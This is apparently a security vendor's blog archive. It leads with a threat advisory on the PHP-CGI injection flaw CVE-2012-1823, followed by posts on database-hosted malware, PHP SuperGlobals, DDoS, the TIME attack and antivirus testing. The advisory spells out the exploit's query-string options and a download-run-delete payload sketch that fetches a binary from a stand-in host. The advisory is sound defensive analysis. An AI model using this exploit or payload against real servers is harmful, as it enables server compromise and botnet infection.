March 18, 2014
 Threat Advisory: PHP-CGI At Your Command

PHP has long been the dominant server-side framework for building web applications; roughly 82% of all websites run on it today. While PHP's popularity attracts security researchers looking for flaws – which drives maturity, documentation, and security best practices – the same numbers drive hackers to focus on it as well.


In October 2013, a public exploit for PHP was disclosed. The exploit targets a vulnerability found in May 2012 and catalogued as CVE-2012-1823, which shows that PHP, in conjunction with Apache, suffers from a command injection vulnerability.

Soon after the exploit was released, Imperva honeypots detected web servers being attacked with it in different flavors. In the first three weeks following the publication we recorded as many as 30,000 attack campaigns using the exploit. As this was an interesting surge in attack activity, we decided to look deeper into the attack.

Later on, we picked up intelligence showing that different botnets had adopted the vulnerability because of its effectiveness, and we also captured samples of bot clients with this exploit embedded in them.

One of the interesting points is that despite the vulnerability being somewhat dated, cybercriminals are still using it, understanding that a major part of the PHP install base is not updated on a regular basis – thus creating a window of opportunity.

In this threat advisory, we will cover the following:

  • The technical background and analysis of the vulnerability and exploitation techniques
  • Samples of the attack vectors captured in the wild
  • Industrialized cybercrime aspects of this vulnerability
  • Mitigation techniques

 

A first look into the vulnerability

The exploit first appeared in the various vulnerability databases on October 29, 2013, referencing the vulnerability identified as CVE-2012-1823. The exploitation code was soon available via different exploit websites.


The vulnerability enables a remote attacker to execute arbitrary commands on a web server running PHP versions before 5.3.12, or 5.4.x before 5.4.2. These versions account for 16% of all public websites on the Internet.


 

The honeypot trail…

After analyzing the attacks recorded by our honeypots, we learned a few interesting facts:

  • The overall count of attackers (distinct source IPs) was 324, while the overall count of targeted web servers was 272. Most of the attacks originated from the US (35%), France (21%) and Germany (15%).


  • The most common URL used in the attacks was, by far, //cgi-bin/php. Later on we will explain why the attack requires the exact location of the PHP CGI executable in order to succeed.


  • The biggest attacks in terms of volume were carried out over a period of half a day to a full day.


  • The vast majority of the attackers (86 distinct attacker IPs) executed their attack over a half-day or one-day period against a single target. As the attack period and the number of targets grew, the number of attackers dropped significantly.


Technical Background and Analysis         

The vulnerability's official (and somewhat confusing) description states that sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an "=" (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string.

The simple, straightforward explanation is that an external attacker can set command line options for the PHP execution engine. Such command line options eventually allow the attacker to execute arbitrary PHP code on the server.

You might scratch your head and ask – haven't we seen this before? The answer is YES! This vulnerability is not new, and public exploits for it had been published before.


In previous cases, the attack relied on the server configuration redirecting all PHP files to PHP CGI, thus making the server vulnerable to code leakage, code execution and more. The new attack, however, tries to access the PHP CGI binary directly, and hence must use the exact location of the PHP CGI executable.

Before we move on, it is essential to understand what PHP CGI is and how it works. Common Gateway Interface (CGI) is a standard method used to generate dynamic content on web pages and web applications. PHP CGI means using the PHP interpreter in CGI mode: the web server passes the data from the request to PHP (an external program), whose input is a PHP file (usually on the server) and whose output is HTML (usually rendered in the client's browser). PHP CGI behavior is configured via PHP INI directives.

The vulnerability allows remote attackers to place PHP command-line options in the query string, including the "-d" option, which defines a PHP INI directive before the PHP interpreter runs. In this attack, the "-d" option is used to manipulate PHP security settings in order to bypass security checks and allow remote code execution.
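To see what the "-d" flag does on its own, here is a benign local illustration (the directive and code below are arbitrary examples, not part of the attack):

    # Override an INI directive for a single run of the interpreter
    php -d display_errors=1 -r 'echo ini_get("display_errors"), PHP_EOL;'
    # prints: 1

In the exploit, the same flag is simply smuggled in through the query string of a request to the php-cgi binary.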

Looking at the sapi/cgi/cgi_main.c file in the vulnerable PHP code tree, we can see which directives are involved in the CGI security checks.


The code checks two PHP CGI settings: cgi.force_redirect and cgi.redirect_status_env.

The PHP configuration directive cgi.force_redirect prevents anyone from calling PHP directly with a URL. Since PHP turns this directive on by default, direct access to PHP via http://example.com/cgi-bin/php produces an HTTP error code and the following error message:

The PHP CGI cannot be accessed directly. This PHP CGI binary was compiled with force-cgi-redirect enabled.  This means that a page will only be served up if the REDIRECT_STATUS CGI variable is set, e.g. via an Apache Action directive.

Controlling the cgi.force_redirect and cgi.redirect_status_env values enables the attacker to bypass the PHP CGI security check.

Another crucial directive that is set using the "-d" option in the attack is auto_prepend_file. This directive specifies the name of a file that is automatically parsed before the main file; php://input is a read-only stream which, in our case, contains the raw data from the request body.

By setting auto_prepend_file to php://input, the attack payload (arbitrary PHP code) can simply be placed in the request body.

Attack vectors captured in the wild

Let's take a look at an example attack vector that was captured in the wild, and at the PHP command-line options it translates to.
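The following is a representative reconstruction of this class of vector, based on the publicly documented CVE-2012-1823 exploit (the exact strings captured in the wild varied, and the query string is normally fully URL-encoded):

    POST //cgi-bin/php?<URL-encoded options> HTTP/1.1

where the URL-encoded query string decodes to:

    -d allow_url_include=on
    -d safe_mode=off
    -d suhosin.simulation=on
    -d disable_functions=""
    -d open_basedir=none
    -d auto_prepend_file=php://input
    -d cgi.force_redirect=0
    -d cgi.redirect_status_env=0
    -n

The cgi.force_redirect and cgi.redirect_status_env overrides defeat the CGI security checks described above, auto_prepend_file=php://input causes the request body to be parsed as PHP code, and "-n" tells the interpreter to ignore the server's php.ini altogether.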

Not surprisingly, the HTTP request body in the captured attack vectors contained PHP code that downloaded and installed a botnet malware client.


Payload analysis

We have managed to identify 43 different types of payload data in the attacks registered by our honeypot. The payloads appear to be botnet malware clients constructed according to the following pattern:


The PHP payload is designed to download a malware executable from a remote server into an inconspicuous directory (/tmp, /dev/shm, /var/lock, /var/tmp), run it, and hide that it ever existed by removing it from the file system. The servers that host these files are usually legitimate, though compromised, servers, and the file names are disguised as image or text files.
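A minimal sketch of this pattern, using a hypothetical download URL and file name (an illustration of the behavior described above, not one of the captured payloads):

    <?php
    // Illustration only: fetch a binary, drop it in a world-writable
    // directory under an innocuous name, execute it, then delete it.
    $cmd = "cd /tmp; "
         . "wget -q http://compromised-host.example/logo.png -O .sysupd; "
         . "chmod +x .sysupd; "
         . "./.sysupd; "
         . "rm -f .sysupd";
    system($cmd);
    ?>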

The malware files are usually written in PHP, Python or C, and vary from simple reverse-shell backdoors to IRC clients that connect to C&C servers. We also noticed that some of the malware behaves differently depending on the kernel version and processor architecture of the infected server.



Our experience shows that this level of sophistication is linked with industrialized crime, also known as bot herding. The attackers in this case scan for servers that are exposed to the vulnerability (running PHP CGI from vulnerable versions) and infect them with their bot clients, transforming them into zombies that receive commands from a C&C server under the attackers' control. These botnets are then sold or rented to the highest bidder.

A surprising fact is that even today this vulnerability can be exploited successfully, as companies don't take the appropriate measures to secure their servers. Evidence of this can be found in active drop sites that are still hosting the botnet clients.


 

Some of the botnets that we have been looking into are still active; some are relatively new, and activity can still be witnessed, with commands being sent to the zombie servers operating under their control.

 

It is an intriguing point that cybercriminals understand the serious gap between the time a vulnerability is found in the wild and the time it gets reported and patched (especially when third-party software or a framework, such as PHP, is in the loop). On top of that, there is a further lag until a company becomes aware of both the issue and the fix – and implements it. This creates a window of opportunity that hackers act on, knowing the window will stay open for a long time.


 

PHP Patch

PHP offers a patch (here) to mitigate the vulnerability; it adds a verification that the query string does not include command-line options.


 

Mitigation Recommendations

  • Verify that your PHP version is not vulnerable (i.e., PHP 5.3.12 and up, or PHP 5.4.2 and up); if you still use a vulnerable PHP version, make sure it is patched (a quick self-check sketch follows this list)
  • If possible, do not use PHP in CGI mode
  • Place your web application behind a web application security solution (such as a WAF) to protect it from web attacks such as this one
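A minimal self-check sketch, assuming the fixed releases listed above (5.3.12 / 5.4.2); it only inspects the version string and is no substitute for proper patch management:

    <?php
    // Flag PHP builds affected by CVE-2012-1823 based on the version number alone.
    $version = PHP_VERSION;
    if (version_compare($version, '5.4.0', '>=')) {
        $vulnerable = version_compare($version, '5.4.2', '<');
    } else {
        $vulnerable = version_compare($version, '5.3.12', '<');
    }
    echo $vulnerable
        ? "PHP $version predates the fixed releases - check for vendor patches\n"
        : "PHP $version is at or above the fixed releases\n";
    ?>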

 

December 11, 2013
 HII: Assessing the threat landscape of DBaaS

Over the past few years we've seen an ever-growing tide of data breaches, with reports of new breaches coming out almost every day. Having said that, there are still very few published details on how actual data exfiltration happens, mainly because organizations that have been breached are hesitant to share information beyond what they are obligated to share by law.

As a result, while there is quite a lot of information on how endpoints become infected, as well as on what Command and Control (C&C) communication looks like (IP reputation, etc.), there is almost none on what the threat looks like from the enterprise data center point of view. There are lots of discussions about the need to share information, and for good reason. Unfortunately, these discussions have not necessarily translated into actual sharing.

This lack of insight greatly hampers the ability to develop effective security measures. Statistics are always open to interpretation, and because the security industry is left to rely on statistical analysis, security strategies are often left with a gaping hole.

To fill that void, we constantly conduct research to understand the properties of potential threats to data centers. Our newest Hacker Intelligence Initiative report, "Assessing the Threat Landscape of DBaaS," is the latest result of this research.

What does DBaaS have to do with it?

Data centers are no longer confined to the enterprise perimeter. More and more enterprises take their data to the cloud, but forget to adjust their risk management practices when doing so. The recent MongoHQ breach is just one example of this type of oversight.

While we didn't find malware that directly attacked a database, our research did find and analyze malware with a module able to connect to Microsoft SQL Server (MSSQL). Moreover, the research found that this malware was used to automatically connect to a cloud-hosted MSSQL service for both C&C and data exfiltration purposes.

As an interesting side note, after this report was written we also stumbled upon a cool sample: malware that brought its own MySQL DLL to the infected machine. This correlates with our assessment of growing trends in data center security threats.

What’s in the Report?

The report shows how attackers took advantage of hosted database services in order to set up their own C&C and drop servers. These servers led us to some interesting insights about the advantages of using "malicious" hosted data stores, and the risks they present to legitimate users. For example, enterprises need to re-assess the severity of database vulnerabilities in a hosted environment.

Analyzing the attackers' data store also revealed interesting points – for example, the targeting of business platforms. In conclusion, we predicted what we believe are growing trends in the data-store threat landscape.

Where can I learn more?

  1. Our Hacker Intelligence Initiative (HII) report can be found here
  2. The blog post on the MongoHQ breach, here
  3. A Forbes article looking into the DBaaS trend, here
  4. An Oracle user group research report, covering what users are really doing about audit and security problems, here

 

September 08, 2013
 PHP SuperGlobals: Supersized Trouble
In our latest HII report, we dissect a problem that has been around for ages. The ADC research group has been studying the implications of third-party applications on the security posture of organizations. Attackers are always streamlining their activities and therefore aiming at commonly used third-party components that yield the best return on investment. With that in mind, we investigated one of the most commonly used web infrastructures: PHP.

The PHP platform is by far the most popular web application development platform, powering over 80% of all websites, including top sites such as Facebook, Baidu, and Wikipedia. As a result, PHP vulnerabilities deserve special attention. In fact, exploits against PHP applications can affect the general security and health status of the entire web, since compromised hosts can be used as botnet slaves for further attacks on other servers.

In the PHP architecture, several variables are available in every scope of the application without being explicitly defined in each script. These predefined variables are called PHP SuperGlobals.

Ever since the PHP platform was introduced, the interaction between PHP SuperGlobals and user input has represented a security risk. Despite recommendations by application security experts, this interaction is still here today – probably due to the high flexibility it provides to programmers and due to the amount of legacy code written this way.
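For readers less familiar with the mechanism, here is a minimal illustration (not taken from the report) of how SuperGlobals expose user input directly to application code:

    <?php
    // SuperGlobals such as $_GET, $_POST, $_COOKIE, $_REQUEST, $_SERVER and
    // $GLOBALS are available in every scope without any declaration.
    // The first four are populated straight from the HTTP request, so any
    // code path that trusts them - or lets them overwrite other variables,
    // e.g. via extract($_REQUEST) - hands control of application state to
    // the client.
    function greet() {
        // no "global" keyword or function parameter needed - this is user input
        $name = isset($_GET['name']) ? $_GET['name'] : 'anonymous';
        echo "Hello, " . htmlspecialchars($name) . "\n";
    }
    greet();
    ?>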

Two of the vulnerabilities mentioned in our report date back to 2010 and 2011. Unfortunately, they are still actively and successfully being used in combination with other legacy PHP security issues. That is exactly the problem! We should have gotten rid of the easy path from user input to SuperGlobals a long time ago.

Does this teach us something about patching known problems in the software development lifecycle as a security strategy? Does it imply that one should only trust a 3rd-party application layer security solution that tracks attacks in the wild? SQL injection is also old news. Does this have any effect on SQL injection still being the #1 threat to web applications? Some of these questions are mind blowing, and yet for many they remain unanswered.

Our research explores PHP vulnerabilities and the methods hackers use to exploit them in the wild. We also provide an analysis and specific recommendations on how organizations should prepare and deal with the long-standing security risks of PHP SuperGlobals.

To download the research paper, please click here.

 

August 19, 2013
 Our take on the NSA’s decision to cut back on sys admins

A couple of weeks ago, NSA Director General Alexander was quoted in a Reuters article saying that, in order to limit data access and potential leakage, the agency will cut its system administrator staff by 90%.

This statement drew a lot of criticism, since it makes no sense to cut critical staff in such a disproportionate way – which makes us believe that there is something else there…

"At the end of the day it's about people and trust," Alexander said.

Maybe he should have phrased things a little differently: "At the end of the day it's about people and trust, plus monitoring the people you trust."

It seems like the real issue is not the number of people, but rather the number of people who hold administrative privileges. What you really need to cut is administrative privileges from 90% of the people.

Administrators should not be immune to scrutiny. In order to prevent the next Snowden-like incident, segregation of control should be implemented, so that leaking the data would require collusion between at least two individuals from different teams.

To do so, the security team should be supplied with a compensating monitoring system over file and database access which:

  • The administrators have no control over
  • Can only monitor access to the data, rather than actually access the data (eliminating another potential backdoor)

”In God We Trust, All Others We Monitor”

 

May 09, 2013
 Why Hosters Should Care About Web Security

Earlier this week, the "Moroccan Ghosts" published a list of 52 defaced Israeli sites, replacing site content with political propaganda pages (and some cool Moroccan music).

Looking into the hacked domain list, we noticed that most of the domains in the disclosed list are hosted on the same server – in this case, one belonging to a large hosting company in Israel. It was relatively easy to see that the server itself runs PHP 5.


Although this is merely educated speculation, it seems that the hackers exploited a configuration mistake in the server, rather than exploiting individual vulnerabilities in the hosted applications or taking over the entire server through a vulnerability in a single application. In a shared hosting environment, "one rotten apple spoils the barrel": a single vulnerability may result in owning the entire server and the database that holds the data for all applications.

In other words, when an application is hosted on a shared hosting server, even if an application owned by company A is secure, a less secure application owned by company B can be hacked, and the end result may be a breach of both. The same is true for a secure application running on an insecure platform.

What can hosters do to prevent incidents like this?

  • Proper server administration should enable creating silos in terms of database servers, virtual directories and permissions per customer. This reduces the risk in some ways but does not remove it.
  • Hosters should offer the compartmentalization services they provide to physical customers to their digital, hosted customers as well, by adding web application controls that reduce the risk of such hacks.
  • Make sure that the management platform is secure, since many hoster hacks come through an insecure management console that allows file and DNS changes per provisioned user, or globally.
  • Offer web vulnerability scans to your customers, because most companies do not have the experience that hosters have in dealing with web applications and the security required around them. It makes sense that customers who outsource the hosting of their applications will appreciate outsourcing the security around them as well. However, to complete the cycle, scanning is not enough: once vulnerabilities are found, it is critical to use controls such as web application firewalls to remediate the findings.

 

 

April 22, 2013
 Get What You Give: The Value of Shared Threat Intelligence

The issue of sharing information for security purposes has become a hot discussion topic among both industry practitioners and legislators. CISPA in the US and CISP in the UK are examples of how regulators try to facilitate cyber security information sharing by private sector actors. In fact, cyber security information sharing has already been applied for quite a long time to domains like malware identification, spam mitigation and anti-phishing.

So far, however, cyber security information sharing has not been applied to what is probably one of the most critical domains – web application attacks. Whatever sharing was going on was mostly of a "tell-tale" nature – organizations sharing success (or failure) stories, and vulnerability information made public (usually with a substantial delay).

The research we've conducted in our labs over the past year focused on cyber security information sharing for the web application layer. We tackled the issue from many different angles, including: what is the minimal set of data that should be shared (and still make sense); how can we measure the potential value of the sharing process; and whether the information being shared can be automatically translated into structured, actionable intelligence that can be disseminated back to the community and deployed automatically in a timely fashion.

We covered attack data from over 50 applications in our research, and the results are very favorable. While many details can be found in the report, I'd like to share a couple of examples here on the blog. The first is what we called "reputation quadrants," which show the relevance of attack agents (attack sources, attack vectors or attack tools) to the sharing process. In the reputation quadrant for RFI payloads, for example, we can see that one third of the attack payloads contribute 76% of the attack traffic across the entire set of applications.


This clearly shows that fast identification of some attack agents can make a meaningful contribution to all members of the community. Moreover, if we look at the progress of one specific attack source (among many) that was identified as a persistent SQL injection source across multiple applications, we can see a pattern in which the source attacks only a single target at a time, yet persistently increases its effect on the community over time by hopping from one target to another.


All in all, the contribution made by our work is twofold: quantifying the real value of applying cyber security information sharing to the web application domain, and promoting the idea of automatically producing actionable intelligence from the data. You are all invited to view the full report at this link.

 

March 27, 2013
 Lessons from the Spamhaus DDoS incident


Last week, as part of the spammer/anti-spammer wars, an attack on Spamhaus was mounted using DNS amplification against highly rated DNS servers: botnets sent the initial reflection requests to the DNS servers, which then generated the actual attack traffic. Although we are not sure whether the same vector was used again, the attack was able to direct enough traffic at Spamhaus to reach a reported peak of 300 Gbps of DDoS – a respectable number indeed. It is clear that proper DNS server monitoring and configuration should have deflected the attack at an early stage. The DNS attack vector showed once again the effectiveness of using servers, rather than a user-based botnet, as the source of the attack traffic.

Where can you learn more about DDoS?

  • Imperva White-Paper about the four steps to defeat a DDoS attack
  • HII report that analyzes different DDoS attack techniques, and how to deal with them
  • A short DDoS protection customer story that shows both attack and defense mechanisms

 

 

March 19, 2013
 A Perfect CRIME? Only TIME Will Tell

Sharing security research and intelligence makes the community as a whole safer. By uncovering and sharing information on weaknesses in the Internet, common vulnerabilities and new attack techniques, our customers and the industry learn specific ways to improve their risk posture and gain deeper insight into how cybercriminals operate.

Once upon a Time…

In 2012, a new attack against SSL named "CRIME" (Compression Ratio Info-leak Made Easy) was introduced. The attack exploits an inherent information leakage resulting from the use of HTTP compression to defeat SSL's encryption.

Despite the very interesting find, the CRIME attack suffered from two major practical drawbacks:

  1. The attack threat model: for a CRIME attack to work, the attacker must control the plaintext AND be able to intercept the encrypted message. This model mostly limits the attack to Man-in-the-Middle (MITM) situations, which require eavesdropping.
  2. The CRIME attack was solely aimed at HTTP requests. However, most of the current web does not compress HTTP requests.

Last week at BlackHat 2013 in Amsterdam, Imperva’s Tal Be’ery, a Web Research Team Leader in the ADC Group, presented a new analysis of the CRIME attack, advising that the discovered cyber threat may be more serious than previously believed.

The analysis showed the potential for a new attack technique, which we've dubbed TIME (Timing Info-leak Made Easy), that could overcome the two limitations of the original CRIME attack – specifically, removing the eavesdropping requirement and broadening the attack surface by focusing on HTTP response compression instead of HTTP request compression.

In Layman’s Terms

The TIME attack, which mainly affects web browsers, shows that all the hacker needs to do is redirect an innocent victim to a malicious web server, run certain JavaScript, and obtain the victim's secret data; the barrier of the eavesdropping requirement is removed.

Diving into the Research

First and foremost, SSL is NOT broken and your online bank accounts are pretty much as safe as they were before this research. Attackers will still try to get your data by infecting your machines with malware and attacking the server with SQL injection or other web application attacks to get the data within the database. Tal’s research focused on being one step ahead of the hackers - understanding how they could evolve the attack to make it easier and more effective – so that the security industry becomes aware of the potential problem.

The main focus areas of the research:

  • Show that the CRIME attack can be extended to HTTP responses – the original CRIME attack had shown that the interaction between compression and encryption may leak data. However, the attack was limited to discovering secret data in the HTTP request, namely the cookie, and was therefore easily mitigated by disabling compression of the cookie header. Tal showed that CRIME attack techniques can be extended to attack any secret data in the HTTP response.
  • Remove the eavesdropping requirement – the eavesdropping requirement of the CRIME attack is one of the main reasons the vector was considered impractical, since it required the attacker to be located on the same network or to already have some control over the victim.

Key Takeaway

Using the extended TIME techniques, our research shows that an attacker can infer the size of the data from timing measurements taken by JavaScript, allowing the attack to be carried out by a remote attacker. This elevates the severity of the attack vector, as it removes the need for eavesdropping from the game. Second, extending the attack to HTTP responses grows the attack surface, as most applications allow HTTP response compression for performance reasons (unlike HTTP request compression, which is often redundant), therefore making the potentially vulnerable attack surface larger.

Where can I learn more?

You are invited to download Tal's BlackHat presentation. Further information, and its relation to other research work, can be found at Ars Technica at this link.


 

February 21, 2013
 Introducing the WAF Testing Framework

Last week I attended an OWASP conference in Israel and participated in a panel about WAFEC. This panel is part of the ongoing effort to produce the second version of the WAF evaluation criteria standard. The panel gave me an opportunity to express my major concern about WAF evaluation today – the lack of measuring tools, and in particular the continued disregard for measuring false positives.

I already expressed these concerns at the last OWASP US conference, where I presented a tool that might help the community overcome these issues. The tool, called the WAF Testing Framework (WTF), is easily configured with traffic samples that represent attacks (in a stateful manner) as well as good traffic. It then replays this traffic against a bundled web application, assuming a WAF is installed in the path. The tool measures the WAF's response to each request and displays a chart that includes information on false negatives as well as false positives.

We've decided to make this tool available to the community as open source. Initially it is available on our site here. We will probably open an open source project for it on one of the standard repositories soon.

 

 

January 10, 2013
 Still Don't Like Our AV Study? A Response to The Critics

Imperva CTO Amichai Shulman:

Let me start by saying that I’m not a big fan of back and forth argumentative discussions taking place in the blogosphere. However, the religious rage that erupted over the past couple of weeks with respect to our paper, Assessing the Effectiveness of Antivirus Solutions, compels me to provide some response.

Trying to avoid dragging the reader through a lengthy text full of complex arguments I’ll try to take this backwards (kind of the “Backwards Episode” from Seinfeld). The bottom line is in fact that many people have questioned the core aspects of our research: choice of malware samples and method of sample evaluation. However, even among those who have questioned our methodology, there seems to be a consensus around our conclusions – that standard AV solutions have reached the point of diminishing returns and organizations must shift their investments towards other solutions that protect organizations from the effects of infection. I have to assume that if our methodology leads us in a logical way to conclusions that are so widely acceptable, it can’t be all that wrong.

Criticism #1:  Sampling
The first part of the criticism targeted our choice of malware samples. Let me again put forward the bottom line – our critics basically claim that our results are so different than theirs because the method we used to collect the samples is incorrect. Let me put this in different words – if attackers choose malware the way AV vendors instruct them to, detection rates become blissful. If attackers choose malware in a different manner, you’re toast.

Poor sampling would be a fair argument to make if we had used some mysterious technique for collecting malware that can only be applied by high-end criminal gangs. That is, of course, not the case. We used Google searches with terms that get us close to sporadic malware repositories on publicly accessible web pages. We salted that with some links we obtained through sporadic searches in soft-core hacker forums. We did focus on Russian-language forums, but I do not believe that this is controversial. Meanwhile, the "cream of the crop" was supplied by some links we took from traffic obtained through anonymous proxies. All this collection work was done by unbiased people – people who are NOT in the business of hacking and are not employed by antivirus companies.

Moreover, if we inspect the claim made by antivirus vendors with respect to what the "right" set of malware samples is, it actually supports our findings. They claim that with the sample volume they deal with – 100K per day – they achieve higher than 90% detection (98% according to one report). That is, they miss 2,000 malware samples out of 100K. How hard do you think it is for an attacker (and I intentionally did not add the term "skilled") to get his hands on a couple of those 2,000 undetected samples? I should add that all the samples included in our statistics – out of the samples that we collected and tested – were eventually detected by a large enough set of AV products, and that none of them was a brand new malicious code; rather, they were all variations and instances of existing malware.

Criticism #2:  Using VirusTotal
The second part of the criticism touches on our use of VirusTotal.com (VT) as a tool for conducting an experiment related to AV effectiveness. We recognize the limitations of using VT, and described those limitations in our paper. However, bottom line first – we are not the first to publish comparative studies of AV efficiency, or to publish analysis of AV efficiency based on VT. We drew explicit conclusions that are not put in technical terms but in plain business terms – organizations should start shifting their budgets to other solutions for the malware infection problem.

The first and foremost statement made by critics is "you should not have used VT because they say so." Again, here's the bottom line – we used VT in a prudent and polite way. We did not use undocumented features, we did not subvert APIs, and we did not feed it with data for the purpose of subverting the results of AV vendor decisions (which is an interesting experiment on its own). So basically, our wrongdoing with respect to VT is the way we interpreted the results and the conclusions we drew from them – and objecting to that deserves no other term than "thought police." This is before mentioning the fact that various recent reports and publications have used VT for the same purpose (including Brian Krebs). I know that VT does not claim or purport to be an anti-malware detection tool, and that VT is not intended to be used as an AV replacement. However, it cannot claim to be only a collection tool for the AV industry whose per-sample results are completely meaningless; having an upload / get-results API further disproves that claim. I deeply regret being dragged into this debate with VT, since I truly value their role in the anti-malware community and have the utmost respect for their contribution to improvements in AV detection techniques and malware research.

One of the most adamant arguments against the validity of VT as a measurement for effectiveness is that it uses the command-line version of AV products and that configuration may not be ideal. I’d like to quote:

  • VirusTotal uses command-line versions: that also affects execution context, which may mean that a product fails to detect something it would detect in a more realistic context.
  • It uses the parameters that AV vendors indicate: if you think of this as a (pseudo)test, then consider that you’re testing vendor philosophy in terms of default configurations, not objective performance.
  • Some products are targeted for the gateway: gateway products are likely to be configured according to very different presumptions to those that govern desktop product configuration.
  • Some of the heuristic parameters employed are very sensitive, not to mention paranoid.

Regarding the first point, I personally do appreciate the potential difference between a command-line version of an AV tool and other deployed versions. However, in terms of signatures and reputation heuristics, I don't really get it. I'd love to see AV vendors explain that difference in detail, and in particular point out which types of malware are not detected by their command-line version but are detected by their other versions, and why. I am certainly willing to accept that our results would have been somewhat different had we tested an actually installed version of the product rather than the command-line version. However, I do think they are a good approximation. If AV vendors claim that this is far from true, I'd really like to see the figures. Is the command-line version 10%, 50% or 90% less effective than the product?

I don’t see the point in the second argument. Are they really claiming that VT configuration is not good because it is the recommended vendor configuration?

As for the third argument, this is really puzzling. According to this, we should have experienced a high ratio of false positives, rather than the high ratio of false negatives that we have observed in practice.

Quoting again:

VirusTotal is self-described as a TOOL, not a SOLUTION: it’s a highly collaborative enterprise, allowing the industry and users to help each other. As with any other tool (especially other public multi-scanner sites), it’s better suited to some contexts than others. It can be used for useful research or can be misused for purposes for which it was never intended, and the reader must have a minimum of knowledge and understanding to interpret the results correctly. With tools that are less impartial in origin, and/or less comprehensively documented, the risk of misunderstanding and misuse is even greater.

Again, the writer agrees that VT is indeed a tool that can be used for research as long as results are correctly interpreted. Yes, it is possible that we’ve misinterpreted the results. If that is your opinion then argue with our interpretation of the results. Unfortunately most critics chose not to do so, but rather argued that we used the wrong tools.

Epilogue
I could continue; however, I think that I've addressed the main criticism against our work and shown that most of it is immaterial. I would like to see a livelier debate around our interpretation of the results and the conclusion – AV solutions attempting to prevent infection have reached a point of diminishing returns, and are thus providing attackers with a large enough window of opportunity, time-wise and device-wise, to penetrate organizations and remain undetected for extremely long periods. It does not mean that we have to throw AV solutions away; it just means that we need to start shifting some of the money towards solutions that detect and prevent the effects of infection.

 

 
